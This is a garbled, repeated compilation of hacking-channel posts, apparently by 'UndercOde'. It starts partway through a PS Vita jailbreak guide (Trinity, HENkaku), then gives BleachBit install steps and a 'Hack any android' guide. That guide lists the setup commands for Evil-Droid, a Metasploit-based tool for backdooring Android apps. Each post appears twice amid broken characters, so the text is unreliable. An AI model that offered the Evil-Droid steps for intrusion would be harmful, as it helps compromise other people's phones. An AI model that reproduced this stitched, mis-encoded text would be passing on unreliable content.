12) Now you need to copy back the modified backup to your PS Vita: Launch Content Manager on your PS Vita and connect it to your computer (if it's already open, just go back to the first menu), where you then need to select PC -> PS Vita System, and after that you select Applications. Finally select PSPβ’/Other and click on the modified game.
13) In the livearea, the game should now have a different icon and should now be called Trinity (eventually you have to rebuild the database in recovery mode to make the bubble change its look). If not, please re-read the instructions more carefully and begin from fresh.
> Turn on Wi-Fi, then reboot your device and straightly launch Trinity. Do not do anything else, otherwise the exploit will be less reliable. It is very important that you do not have any running downloads in background.
15) Enjoy the exploitation process and wait until it launches the Construct. If the exploit fails, simply rerun Trinity.
16) Within the Construct, select Download VitaShell, then Install HENkaku and finally Exit.
Congratulations, your device is now able to run homebrews. It is highly suggested that you downgrade your device to either firmware 3.60 or 3.65/3.67/3.68 using modoru. On 3.60, you can use HENkaku and on 3.65/3.67/3.68 you can use h-encore. If you don't downgrade your device now, you may lose the ability to launch Trinity later and therefore not be able to hack your device anymore.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
> Turn on Wi-Fi, then reboot your device and straightly launch Trinity. Do not do anything else, otherwise the exploit will be less reliable. It is very important that you do not have any running downloads in background.
15) Enjoy the exploitation process and wait until it launches the Construct. If the exploit fails, simply rerun Trinity.
16) Within the Construct, select Download VitaShell, then Install HENkaku and finally Exit.
Congratulations, your device is now able to run homebrews. It is highly suggested that you downgrade your device to either firmware 3.60 or 3.65/3.67/3.68 using modoru. On 3.60, you can use HENkaku and on 3.65/3.67/3.68 you can use h-encore. If you don't downgrade your device now, you may lose the ability to launch Trinity later and therefore not be able to hack your device anymore.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Cleaner for Linux /
BleachBit system cleaner for Windows and Linux
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/bleachbit/bleachbit
2) make -C po local # build translations
3) python bleachbit.py
Then, review the preferences.
4) Then, select some options, and click Preview. Review the files, toggle options accordingly, and click Delete.
5) For information regarding the command line interface, run:
>python bleachbit.py --help
That! all
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Cleaner for Linux /
BleachBit system cleaner for Windows and Linux
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/bleachbit/bleachbit
2) make -C po local # build translations
3) python bleachbit.py
Then, review the preferences.
4) Then, select some options, and click Preview. Review the files, toggle options accordingly, and click Delete.
5) For information regarding the command line interface, run:
>python bleachbit.py --help
That! all
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack any android the evil-droid :
t.me/UndercOdeTesting
π¦Requirements :
1 ) metasploit-framework
2 ) xterm
3 ) Zenity
4 ) Aapt
5 ) Apktool
6) Zipalign
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download the tool from github
> git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2) Set script execution permission
> cd Evil-Droid
> chmod +x evil-droid
3) Run Evil-Droid Framework :
> ./evil-droid
choose option
π¦Tested by UndercOde
> kali
>debian
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack any android the evil-droid :
t.me/UndercOdeTesting
π¦Requirements :
1 ) metasploit-framework
2 ) xterm
3 ) Zenity
4 ) Aapt
5 ) Apktool
6) Zipalign
π¦πβπππΈπππππΈπππβ & βπβ:
1) Download the tool from github
> git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2) Set script execution permission
> cd Evil-Droid
> chmod +x evil-droid
3) Run Evil-Droid Framework :
> ./evil-droid
choose option
π¦Tested by UndercOde
> kali
>debian
@MΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β